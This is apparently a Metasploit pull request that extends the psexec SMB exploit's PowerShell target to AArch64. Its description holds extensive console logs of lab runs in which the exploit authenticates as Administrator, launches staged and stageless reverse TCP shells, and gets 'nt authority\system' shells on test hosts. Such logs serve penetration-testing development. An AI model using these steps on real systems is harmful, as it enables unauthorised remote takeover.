### PR TITLE
Feature/add aarch64 rex powershell

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -538,7 +538,7 @@ GEM
       rex-arch
     rex-ole (0.1.9)
       rex-text
-    rex-powershell (0.1.103)
+    rex-powershell (0.1.105)
       bigdecimal
       rex-random_identifier
       rex-text

--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -66,11 +66,8 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Platform' => 'win',
         'Targets' => [
-          # PowerShell isn't offered for AArch64: the PowerShell shellcode-injection
-          # wrapper (rex-powershell) only knows how to spawn x86/x64 powershell.exe,
-          # so it can't be used to run AArch64 shellcode.
           [ 'Automatic', { 'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64] } ],
-          [ 'PowerShell', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
+          [ 'PowerShell', { 'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64] } ],
           [ 'Native upload', { # upload a service executable
             'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64],
             # service executables place the payload within a segment, 1GiB is a practical max in many cases.
@@ -159,12 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     case target.name
     when 'Automatic'
-      # The PowerShell delivery path can only launch x86/x64 powershell.exe, so
-      # an AArch64 payload has to go straight to the native upload technique.
-      if payload_instance.arch.include?(ARCH_AARCH64)
-        print_status('Selecting native target')
-        native_upload_with_workaround(smbshare)
-      elsif powershell_installed?(smbshare, datastore['PSH_PATH'])
+      if powershell_installed?(smbshare, datastore['PSH_PATH'])
         print_status('Selecting PowerShell target')
         execute_powershell_payload
       else


### PR DESCRIPTION
## Description

Update rex-powershell version and the psexec module to support Windows AARCH64 payloads using MSIL, old, reflection, and net powershell loaders.

## Breaking Changes

None

## Verification Steps

<details><summary>Test Results</summary>

```
  msf6 > use exploit/windows/smb/psexec
  [*] Using configured payload windows/meterpreter/reverse_tcp
  [*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST

  msf6 exploit(windows/smb/psexec) > set RHOSTS 10.5.132.154
  RHOSTS => 10.5.132.154
  msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
  SMBUser => Administrator
  msf6 exploit(windows/smb/psexec) > set SMBPass [REDACTED]
  SMBPass => [REDACTED]
  msf6 exploit(windows/smb/psexec) > set TARGET 1
  TARGET => 1
  msf6 exploit(windows/smb/psexec) > set LHOST 10.5.135.210
  LHOST => 10.5.135.210
  msf6 exploit(windows/smb/psexec) > set WfsDelay 15
  WfsDelay => 15
```

  === MATRIX CASE method=msil form=staged payload=windows/shell/reverse_tcp ===

```
  Powershell::method => msil
  PAYLOAD => windows/shell/reverse_tcp
  LPORT => 45901
  [*] Exploit running as background job 0.
  [*] Exploit completed, but no session was created.
  [*] Started reverse TCP handler on 10.5.135.210:45901
  [*] 10.5.132.154:445 - Connecting to the server...
  [*] 10.5.132.154:445 - Authenticating to 10.5.132.154:445 as user 'Administrator'...
  [*] 10.5.132.154:445 - Powershell command length: 5079
  [*] 10.5.132.154:445 - Executing the payload...
  [*] 10.5.132.154:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.154[\svcctl] ...
  [*] 10.5.132.154:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.154[\svcctl] ...
  [*] 10.5.132.154:445 - Obtaining a service manager handle...
  [*] 10.5.132.154:445 - Creating the service...
  [+] 10.5.132.154:445 - Successfully created the service
  [*] 10.5.132.154:445 - Starting the service...
  [+] 10.5.132.154:445 - Service start timed out, OK if running a command or non-service executable...
  [*] 10.5.132.154:445 - Removing the service...
  [+] 10.5.132.154:445 - Successfully removed the service
  [*] 10.5.132.154:445 - Closing service handle...
  [*] Sending stage (240 bytes) to 10.5.132.154

  Active sessions
  ===============

    Id  Name  Type           Information  Connection
    --  ----  ----           -----------  ----------
    1         shell windows               10.5.135.210:45901 -> 10.5.132.154:49692 (10.5.132.154)

  [*] Command shell session 1 opened (10.5.135.210:45901 -> 10.5.132.154:49692) at 2026-08-31 16:24:00 -0500
  [*] Running 'whoami' on shell session -1 (10.5.132.154)
  whoami
  nt authority\system

  C:\Windows\System32>
  [*] Killing all sessions...
  [*] 10.5.132.154 - Command shell session 1 closed.
  Stopping all jobs...
```

  === MATRIX CASE method=msil form=stageless 
  
  ```
  payload=windows/shell_reverse_tcp ===
  Powershell::method => msil
  PAYLOAD => windows/shell_reverse_tcp
  LPORT => 45902
  [*] Exploit running as background job 1.
  [*] Exploit completed, but no session was created.
  [*] Started reverse TCP handler on 10.5.135.210:45902
  [*] 10.5.132.154:445 - Connecting to the server...
  [*] 10.5.132.154:445 - Authenticating to 10.5.132.154:445 as user 'Administrator'...
  [*] 10.5.132.154:445 - Powershell command length: 5003
  [*] 10.5.132.154:445 - Executing the payload...
  [*] 10.5.132.154:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.154[\svcctl] ...
  [*] 10.5.132.154:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.154[\svcctl] ...
  [*] 10.5.132.154:445 - Obtaining a service manager handle...
  [*] 10.5.132.154:445 - Creating the service...
  [+] 10.5.132.154:445 - Successfully created the service
  [*] 10.5.132.154:445 - Starting the service...
  [+] 10.5.132.154:445 - Service start timed out, OK if running a command or non-service executable...
  [*] 10.5.132.154:445 - Removing the service...
  [+] 10.5.132.154:445 - Successfully removed the service
  [*] 10.5.132.154:445 - Closing service handle...

  Active sessions
  ===============

    Id  Name  Type   Information  Connection
    --  ----  ----   -----------  ----------
    2         shell               10.5.135.210:45902 -> 10.5.132.154:49694 (10.5.132.154)

  [*] Command shell session 2 opened (10.5.135.210:45902 -> 10.5.132.154:49694) at 2026-08-31 16:24:19 -0500
  [*] Running 'whoami' on shell session -1 (10.5.132.154)
  whoami
  nt authority\system

  C:\Windows\System32>
  [*] Killing all sessions...
  [*] 10.5.132.154 - Command shell session 2 closed.
  Stopping all jobs...
```

  === MATRIX CASE method=old form=staged payload=windows/shell/reverse_tcp ===

```
  Powershell::method => old
  PAYLOAD => windows/shell/reverse_tcp
  LPORT => 45903
  [*] Exploit running as background job 2.
  [*] Exploit completed, but no session was created.
  [*] Started reverse TCP handler on 10.5.135.210:45903
  [*] 10.5.132.154:445 - Connecting to the server...
  [*] 10.5.132.154:445 - Authenticating to 10.5.132.154:445 as user 'Administrator'...
  [*] 10.5.132.154:445 - Powershell command length: 4094
  [*] 10.5.132.154:445 - Executing the payload...
  [*] 10.5.132.154:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.154[\svcctl] ...
  [*] 10.5.132.154:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.154[\svcctl] ...
  [*] 10.5.132.154:445 - Obtaining a service manager handle...
  [*] 10.5.132.154:445 - Creating the service...
  [+] 10.5.132.154:445 - Successfully created the service
  [*] 10.5.132.154:445 - Starting the service...
  [+] 10.5.132.154:445 - Service start timed out, OK if running a command or non-service executable...
  [*] 10.5.132.154:445 - Removing the service...
  [+] 10.5.132.154:445 - Successfully removed the service
  [*] 10.5.132.154:445 - Closing service handle...
  [*] Sending stage (240 bytes) to 10.5.132.154

  Active sessions
  ===============

    Id  Name  Type           Information  Connection
    --  ----  ----           -----------  ----------
    3         shell windows               10.5.135.210:45903 -> 10.5.132.154:49697 (10.5.132.154)

  [*] Command shell session 3 opened (10.5.135.210:45903 -> 10.5.132.154:49697) at 2026-08-31 16:24:38 -0500
  [*] Running 'whoami' on shell session -1 (10.5.132.154)
  whoami
  nt authority\system

  C:\Windows\System32>
  [*] Killing all sessions...
  [*] 10.5.132.154 - Command shell session 3 closed.
  Stopping all jobs...
```

  === MATRIX CASE method=old form=stageless 
  
  ```
  payload=windows/shell_reverse_tcp ===
  Powershell::method => old
  PAYLOAD => windows/shell_reverse_tcp
  LPORT => 45904
  [*] Exploit running as background job 3.
  [*] Exploit completed, but no session was created.
  [*] Started reverse TCP handler on 10.5.135.210:45904
  [*] 10.5.132.154:445 - Connecting to the server...
  [*] 10.5.132.154:445 - Authenticating to 10.5.132.154:445 as user 'Administrator'...
  [*] 10.5.132.154:445 - Powershell command length: 4034
  [*] 10.5.132.154:445 - Executing the payload...
  [*] 10.5.132.154:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.154[\svcctl] ...
  [*] 10.5.132.154:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.154[\svcctl] ...
  [*] 10.5.132.154:445 - Obtaining a service manager handle...
  [*] 10.5.132.154:445 - Creating the service...
  [+] 10.5.132.154:445 - Successfully created the service
  [*] 10.5.132.154:445 - Starting the service...
  [+] 10.5.132.154:445 - Service start timed out, OK if running a command or non-service executable...
  [*] 10.5.132.154:445 - Removing the service...
  [+] 10.5.132.154:445 - Successfully removed the service
  [*] 10.5.132.154:445 - Closing service handle...

  Active sessions
  ===============

    Id  Name  Type   Information  Connection
    --  ----  ----   -----------  ----------
    4         shell               10.5.135.210:45904 -> 10.5.132.154:49700 (10.5.132.154)

  [*] Command shell session 4 opened (10.5.135.210:45904 -> 10.5.132.154:49700) at 2026-08-31 16:24:56 -0500
  [*] Running 'whoami' on shell session -1 (10.5.132.154)
  whoami
  nt authority\system

  C:\Windows\System32>
  [*] Killing all sessions...
  [*] 10.5.132.154 - Command shell session 4 closed.
  Stopping all jobs...
```

  === MATRIX CASE method=reflection form=staged 
  
  ```
  payload=windows/shell/reverse_tcp ===
  Powershell::method => reflection
  PAYLOAD => windows/shell/reverse_tcp
  LPORT => 45905
  [*] Exploit running as background job 4.
  [*] Exploit completed, but no session was created.
  [*] Started reverse TCP handler on 10.5.135.210:45905
  [*] 10.5.132.154:445 - Connecting to the server...
  [*] 10.5.132.154:445 - Authenticating to 10.5.132.154:445 as user 'Administrator'...
  [*] 10.5.132.154:445 - Powershell command length: 4582
  [*] 10.5.132.154:445 - Executing the payload...
  [*] 10.5.132.154:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.154[\svcctl] ...
  [*] 10.5.132.154:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.154[\svcctl] ...
  [*] 10.5.132.154:445 - Obtaining a service manager handle...
  [*] 10.5.132.154:445 - Creating the service...
  [+] 10.5.132.154:445 - Successfully created the service
  [*] 10.5.132.154:445 - Starting the service...
  [+] 10.5.132.154:445 - Service start timed out, OK if running a command or non-service executable...
  [*] 10.5.132.154:445 - Removing the service...
  [+] 10.5.132.154:445 - Successfully removed the service
  [*] 10.5.132.154:445 - Closing service handle...
  [*] Sending stage (240 bytes) to 10.5.132.154

  Active sessions
  ===============

    Id  Name  Type           Information  Connection
    --  ----  ----           -----------  ----------
    5         shell windows               10.5.135.210:45905 -> 10.5.132.154:57049 (10.5.132.154)

  [*] Command shell session 5 opened (10.5.135.210:45905 -> 10.5.132.154:57049) at 2026-08-31 16:25:14 -0500
  [*] Running 'whoami' on shell session -1 (10.5.132.154)
  whoami
  nt authority\system

  C:\Windows\System32>
  [*] Killing all sessions...
  [*] 10.5.132.154 - Command shell session 5 closed.
  Stopping all jobs...
```

  === MATRIX CASE method=reflection form=stageless 
  
  ```
  payload=windows/shell_reverse_tcp ===
  Powershell::method => reflection
  PAYLOAD => windows/shell_reverse_tcp
  LPORT => 45906
  [*] Exploit running as background job 5.
  [*] Exploit completed, but no session was created.
  [*] Started reverse TCP handler on 10.5.135.210:45906
  [*] 10.5.132.154:445 - Connecting to the server...
  [*] 10.5.132.154:445 - Authenticating to 10.5.132.154:445 as user 'Administrator'...
  [*] 10.5.132.154:445 - Powershell command length: 4491
  [*] 10.5.132.154:445 - Executing the payload...
  [*] 10.5.132.154:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.154[\svcctl] ...
  [*] 10.5.132.154:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.154[\svcctl] ...
  [*] 10.5.132.154:445 - Obtaining a service manager handle...
  [*] 10.5.132.154:445 - Creating the service...
  [+] 10.5.132.154:445 - Successfully created the service
  [*] 10.5.132.154:445 - Starting the service...
  [+] 10.5.132.154:445 - Service start timed out, OK if running a command or non-service executable...
  [*] 10.5.132.154:445 - Removing the service...
  [+] 10.5.132.154:445 - Successfully removed the service
  [*] 10.5.132.154:445 - Closing service handle...

  Active sessions
  ===============

    Id  Name  Type   Information  Connection
    --  ----  ----   -----------  ----------
    6         shell               10.5.135.210:45906 -> 10.5.132.154:57052 (10.5.132.154)

  [*] Command shell session 6 opened (10.5.135.210:45906 -> 10.5.132.154:57052) at 2026-08-31 16:25:33 -0500
  [*] Running 'whoami' on shell session -1 (10.5.132.154)
  whoami
  nt authority\system

  C:\Windows\System32>
  [*] Killing all sessions...
  [*] 10.5.132.154 - Command shell session 6 closed.
  Stopping all jobs...
```

  === MATRIX CASE method=net form=staged payload=windows/shell/reverse_tcp ===

```
  Powershell::method => net
  PAYLOAD => windows/shell/reverse_tcp
  LPORT => 45907
  [*] Exploit running as background job 6.
  [*] Exploit completed, but no session was created.
  [*] Started reverse TCP handler on 10.5.135.210:45907
  [*] 10.5.132.154:445 - Connecting to the server...
  [*] 10.5.132.154:445 - Authenticating to 10.5.132.154:445 as user 'Administrator'...
  [*] 10.5.132.154:445 - Powershell command length: 4473
  [*] 10.5.132.154:445 - Executing the payload...
  [*] 10.5.132.154:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.154[\svcctl] ...
  [*] 10.5.132.154:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.154[\svcctl] ...
  [*] 10.5.132.154:445 - Obtaining a service manager handle...
  [*] 10.5.132.154:445 - Creating the service...
  [+] 10.5.132.154:445 - Successfully created the service
  [*] 10.5.132.154:445 - Starting the service...
  [+] 10.5.132.154:445 - Service start timed out, OK if running a command or non-service executable...
  [*] 10.5.132.154:445 - Removing the service...
  [+] 10.5.132.154:445 - Successfully removed the service
  [*] 10.5.132.154:445 - Closing service handle...
  [*] Sending stage (240 bytes) to 10.5.132.154

  Active sessions
  ===============

    Id  Name  Type           Information  Connection
    --  ----  ----           -----------  ----------
    7         shell windows               10.5.135.210:45907 -> 10.5.132.154:57055 (10.5.132.154)

  [*] Command shell session 7 opened (10.5.135.210:45907 -> 10.5.132.154:57055) at 2026-08-31 16:25:52 -0500
  [*] Running 'whoami' on shell session -1 (10.5.132.154)
  whoami
  nt authority\system

  C:\Windows\System32>
  [*] Killing all sessions...
  [*] 10.5.132.154 - Command shell session 7 closed.
  Stopping all jobs...
```

  === MATRIX CASE method=net form=stageless 
  
  ```
  payload=windows/shell_reverse_tcp ===
  Powershell::method => net
  PAYLOAD => windows/shell_reverse_tcp
  LPORT => 45908
  [*] Exploit running as background job 7.
  [*] Exploit completed, but no session was created.
  [*] Started reverse TCP handler on 10.5.135.210:45908
  [*] 10.5.132.154:445 - Connecting to the server...
  [*] 10.5.132.154:445 - Authenticating to 10.5.132.154:445 as user 'Administrator'...
  [*] 10.5.132.154:445 - Powershell command length: 4365
  [*] 10.5.132.154:445 - Executing the payload...
  [*] 10.5.132.154:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.154[\svcctl] ...
  [*] 10.5.132.154:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.154[\svcctl] ...
  [*] 10.5.132.154:445 - Obtaining a service manager handle...
  [*] 10.5.132.154:445 - Creating the service...
  [+] 10.5.132.154:445 - Successfully created the service
  [*] 10.5.132.154:445 - Starting the service...
  [+] 10.5.132.154:445 - Service start timed out, OK if running a command or non-service executable...
  [*] 10.5.132.154:445 - Removing the service...
  [+] 10.5.132.154:445 - Successfully removed the service
  [*] 10.5.132.154:445 - Closing service handle...

  Active sessions
  ===============

    Id  Name  Type   Information  Connection
    --  ----  ----   -----------  ----------
    8         shell               10.5.135.210:45908 -> 10.5.132.154:57058 (10.5.132.154)

  [*] Command shell session 8 opened (10.5.135.210:45908 -> 10.5.132.154:57058) at 2026-08-31 16:26:11 -0500
  [*] Running 'whoami' on shell session -1 (10.5.132.154)
  whoami
  nt authority\system

  C:\Windows\System32>
  [*] Killing all sessions...
  [*] 10.5.132.154 - Command shell session 8 closed.
  Stopping all jobs...
```

</details>




## Test Evidence

# rex-powershell 0.1.105 Test Matrix

Module: `exploit/windows/smb/psexec`
Target: `PowerShell` (`TARGET 1`)
Identity expected: `nt authority\system`

| Host architecture | Payload architecture | Host | Method | Staged | Stageless | `whoami` | Result |
|---|---|---|---|---|---|---|---|
| AARCH64 | AARCH64 | `10.5.132.147` | MSIL | Pass | Pass | `nt authority\system` | Pass |
| AARCH64 | AARCH64 | `10.5.132.147` | old | Pass | Pass | `nt authority\system` | Pass |
| AARCH64 | AARCH64 | `10.5.132.147` | reflection | Pass | Pass | `nt authority\system` | Pass |
| AARCH64 | AARCH64 | `10.5.132.147` | net | Pass | Pass | `nt authority\system` | Pass |
| x86 | x86 | `10.5.132.102` | MSIL | Pass | Pass | `nt authority\system` | Pass |
| x86 | x86 | `10.5.132.102` | old | Pass | Pass | `nt authority\system` | Pass |
| x86 | x86 | `10.5.132.102` | reflection | Pass | Pass | `nt authority\system` | Pass |
| x86 | x86 | `10.5.132.102` | net | Pass | Pass | `nt authority\system` | Pass |
| x64 | x64 | `10.5.132.154` | MSIL | Pass | Pass | `nt authority\system` | Pass |
| x64 | x64 | `10.5.132.154` | old | Pass | Pass | `nt authority\system` | Pass |
| x64 | x64 | `10.5.132.154` | reflection | Pass | Pass | `nt authority\system` | Pass |
| x64 | x64 | `10.5.132.154` | net | Pass | Pass | `nt authority\system` | Pass |
| x64 | x86 (WOW64) | `10.5.132.154` | MSIL | Pass | Pass | `nt authority\system` | Pass |
| x64 | x86 (WOW64) | `10.5.132.154` | old | Pass | Pass | `nt authority\system` | Pass |
| x64 | x86 (WOW64) | `10.5.132.154` | reflection | Pass | Pass | `nt authority\system` | Pass |
| x64 | x86 (WOW64) | `10.5.132.154` | net | Pass | Pass | `nt authority\system` | Pass |

## Environment

| Field | Details |
|-------|---------|
| **Operating System** | <!-- e.g., Ubuntu 22.04, Windows 11, macOS 14.2 --> |
| **Target Software/Hardware** | <!-- Name and version of the software or hardware targeted by this change --> |
| **Docker Image / Vagrant Setup** | <!-- (Optional) Image name or setup instructions if applicable, otherwise remove this row --> |

## AI Usage Disclosure

<!-- Was AI used in the creation of this PR? If so, describe what tools were used and how (e.g., code generation, documentation drafting, test writing). Write "None" if no AI tools were used. -->



## Pre-Submission Checklist

- [ ] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [ ] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [ ] Tested on the target environment specified in the Environment section above
- [ ] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [ ] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)

<!-- After the PR has been submitted, check on the GitHub Actions status and review the job for any failures (red-X marks). Resolve these issues as they will be flagged by review. -->

<details>
<summary>Hardware and Complex Software Module Guidance</summary>

If your module targets specialized hardware (routers, IoT, PLCs, etc.) or complex software (licensed, multi-service, or multi-version), provide a pcap, screen recording, or video showing successful execution.

Email sanitized pcaps/recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com) — remove real IPs, credentials, and hostnames before sending. If hardware/software is unavailable, explain in the PR description.

</details>

<details>
<summary>Responsiveness and PR Takeover Policy</summary>

We want every contribution to make it into the project. If approximately 2 weeks pass after a review request without a comment or code update from you, the team may take over the PR and complete the work on your behalf.

If this happens, you will remain credited as a co-author on the final commit — your contribution is always recognized.

This policy exists to keep the project moving forward. It is not a reflection on the quality of your work or your involvement. Life happens, and we would rather finish the work together than let a good contribution go stale.

</details>
